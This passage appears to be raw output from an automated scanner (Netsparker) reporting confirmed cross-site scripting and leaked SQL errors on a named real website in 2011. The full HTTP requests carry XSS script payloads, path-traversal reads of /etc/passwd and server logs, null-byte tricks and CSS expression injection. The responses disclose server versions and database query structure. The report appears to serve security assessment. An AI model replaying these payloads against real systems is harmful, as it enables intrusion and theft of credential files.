prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005CF)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/

/ppc/leadflow/obtm00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005CD)</script>

Request

GET /ppc/leadflow/obtm00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005CD)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gurb5g6oc4fll5lkkl8kar8427; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>' OR prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>' OR prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>' OR prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>' OR prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>' OR prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005CD)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?'"--></style></script><script>alert(0x0005D1..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005D1)</script>

Request

GET /ppc/leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rshr0mtdfivohbrpj04nod7ug7; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId 
where prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D1)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005D3)%3C/script%3E

/ppc/leadflow/obtm00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005D3)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005D3)</script>

Request

GET /ppc/leadflow/obtm00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005D3)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=22s61ink5416l2ifhhk7a4voo3; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


